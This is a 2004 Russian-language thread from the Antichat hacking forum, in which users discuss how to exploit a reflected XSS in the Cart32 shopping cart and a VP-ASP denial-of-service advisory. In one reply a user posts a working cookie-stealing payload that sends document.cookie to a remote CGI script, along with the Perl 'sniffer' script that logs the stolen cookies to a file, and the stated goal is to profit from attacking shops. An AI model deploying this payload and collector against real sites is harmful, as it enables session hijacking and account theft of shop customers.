ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.09.2004, 15:46
Аватар для PUMA
PUMA
Новичок
Регистрация: 15.09.2004
Сообщений: 11
Провел на форуме:
0

Репутация: 0
Отправить сообщение для PUMA с помощью ICQ
По умолчанию

как реальзовать данную уязвимость шопа
scripts/cart32.exe/GetLatestBuilds?cart32=<script&gt;alert('XSS')&lt;/script&gt;
для получения полезного
 
Ответить с цитированием

  #2  
Старый 16.09.2004, 12:36
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

Дай полный адрес
 
Ответить с цитированием

  #3  
Старый 16.09.2004, 17:54
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

PUMA, а смысл использовать xss, если это подействует только на тебя ?
 
Ответить с цитированием

  #4  
Старый 16.09.2004, 20:52
Аватар для PUMA
PUMA
Новичок
Регистрация: 15.09.2004
Сообщений: 11
Провел на форуме:
0

Репутация: 0
Отправить сообщение для PUMA с помощью ICQ
По умолчанию

стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...
 
Ответить с цитированием

  #5  
Старый 17.09.2004, 12:25
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 15 2004,15:46)</td></tr><tr><td id="QUOTE">scripts/cart32.exe/GetLatestBuilds?cart32=<script&gt;alert('XSS&#39&lt;/script&gt;[/QUOTE]<span id='postcolor'>
По-моему от таких уязвимостей толку - ноль...
Этот скрипт срабатывает только у того, кто отправил данный запрос... Какой в этом смысл ?
 
Ответить с цитированием

  #6  
Старый 17.09.2004, 14:23
Аватар для JazzzSummerMan
JazzzSummerMan
Постоянный
Регистрация: 07.04.2004
Сообщений: 387
Провел на форуме:
293464

Репутация: 42
По умолчанию

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (PUMA @ сентября 16 2004,20:52)</td></tr><tr><td id="QUOTE">стукните кто разбирается баг нераспространённый
не хочу чтоб в массы вышел...[/QUOTE]<span id='postcolor'>
Да))) Баг действительно нераспространенный) Скажу больше, это даже не баг фактически. Скрывай его дальше
Потом продашь кому-нибудь.
Ну а если по существу, можно конечно найти этому применение, только вероятность совсем невелика. Тем более, чтобы найти уязвимость, нужно хотя бы сами куки для начала посмотреть, и личный кабинет юзера, поэтому и спрашивал полный УРЛ
 
Ответить с цитированием

  #7  
Старый 20.09.2004, 02:59
Аватар для PUMA
PUMA
Новичок
Регистрация: 15.09.2004
Сообщений: 11
Провел на форуме:
0

Репутация: 0
Отправить сообщение для PUMA с помощью ICQ
По умолчанию

ну вот можно купить чтонибудь ///

а вот ещё один ктонибудь сможет реализовать ?

VP-ASP 'shoprestoreorder.asp' May Let Remote Users Keep Database Connections Open
A denial of service vulnerability was reported in VP-ASP. A remote user can consume database resources on the target system.

The vendor reported that a remote user can restore a previous order using 'shoprestoreorder.asp' to potentially cause a database connection to stay open. The vendor indicates that this can cause performance issues.

Impact: &nbsp;A remote user may be able to cause database connections to stay open.

Solution: &nbsp;The vendor has described a fix for 'shoprestoreorder.asp':
 
Ответить с цитированием

  #8  
Старый 09.10.2004, 04:42
Аватар для acidhack
acidhack
Новичок
Регистрация: 09.10.2004
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию

А если по-думать головой?

<script&gt;document.location.href='http://target.com/cgi-bin/cookie.cgi?' + document.cookie;&lt;/script&gt;

(cookie.cgi)
#!/usr/bin/perl -w

open COOKIES,&quot;&gt;&gt;../cookies.txt&quot;;

print &quot;Content-Type: text/html\n\n&quot;;
print COOKIES &quot;----------- new cookie -----------\n&quot;;
print COOKIES &quot;$ENV{'QUERY_STRING'}\n&quot;;
print COOKIES &quot;---------- end of cookie ---------\n\n&quot;;

close COOKIES;

 
Ответить с цитированием

  #9  
Старый 09.10.2004, 18:47
Аватар для Че Гевара
Че Гевара
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме:
4618051

Репутация: 45


По умолчанию

acidhack, это примитивный вариант скрипта снифера ... Лучше использовать наш ... Да и не факт, что кукисы будут полезны ...
 
Ответить с цитированием

  #10  
Старый 06.11.2004, 09:13
Аватар для PEPSICOLA
PEPSICOLA
Познавший АНТИЧАТ
Регистрация: 14.10.2004
Сообщений: 1,162
Провел на форуме:
5619724

Репутация: 2944


По умолчанию

acidhack - Мне типа слово &quot;COOKIES&quot; напоминает кучку маленьких пирожков &nbsp;
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ